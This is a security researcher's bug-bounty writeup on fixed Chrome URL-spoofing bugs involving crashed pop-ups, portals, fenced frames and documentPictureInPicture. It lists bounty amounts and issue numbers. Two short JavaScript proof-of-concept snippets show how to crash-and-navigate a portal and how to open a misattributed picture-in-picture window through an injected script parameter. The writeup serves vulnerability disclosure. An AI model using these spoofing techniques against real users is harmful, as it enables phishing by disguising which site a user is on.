Writeups

Navigating a crashed page

By crashing a cross-origin pop-up and then navigating it to data:html,foo (a navigation that gets blocked), the URL would stay cross-site while the page became same-origin. Issue 40054631 was a duplicate but made a good Twitter background.

Later there was a ghost-image issue where the page stayed cross-origin but the contents of the previous page were still displayed. Issue 40057561 was awarded $1000.

I also tried the same thing with portals (Issue 40064170) and it worked; it was awarded $2000. video PoC

// --enable-features=Portals,PortalsCrossOrigin
// onclick is optional
onclick = () => {
  portal = document.createElement('portal');
  // Victim page crashes
  portal.src = 'https://ndev.tk/crashself.html';
  document.body.appendChild(portal);
  setTimeout(() => {
    // Navigate the crashed portal to a response with HTTP status 204 (no document commits)
    portal.src = 'https://terjanq.me/xss.php?status=204';
    portal.activate();
  }, 6000);
};

These attacks were mitigated by requiring the crash to happen cross-site; however, Issue 40054631 had a way to do this similar to the crossOriginIsolated bypass, and any extension can crash any tab (Issue 40848497).

Spoofing documentPictureInPicture

documentPictureInPicture did not update its security UI on about:blank navigations, so any window reference allowed a spoof. video PoC

This was awarded $1000 and fixed in Issue 40062959 by ensuring subsequent about:blank loads close the PiP window. The first patch was bypassable using the extension chrome.tabs.discard() API. video PoC.

When used from inside a fenced frame, documentPictureInPicture would display the top page's origin rather than the embedded frame's.

// Fenced frame whose content opens a PiP window on click
f = document.createElement('fencedframe');
f.src =
  'https://terjanq.me/xss.php?h[Supports-Loading-Mode]=fenced-frame&js=onclick=()=>documentPictureInPicture.requestWindow();';
document.body.appendChild(f);

This was awarded $4000 and fixed in Issue 40062954 and Issue 40063068 by making it so that non-top-most frames can't open PiP.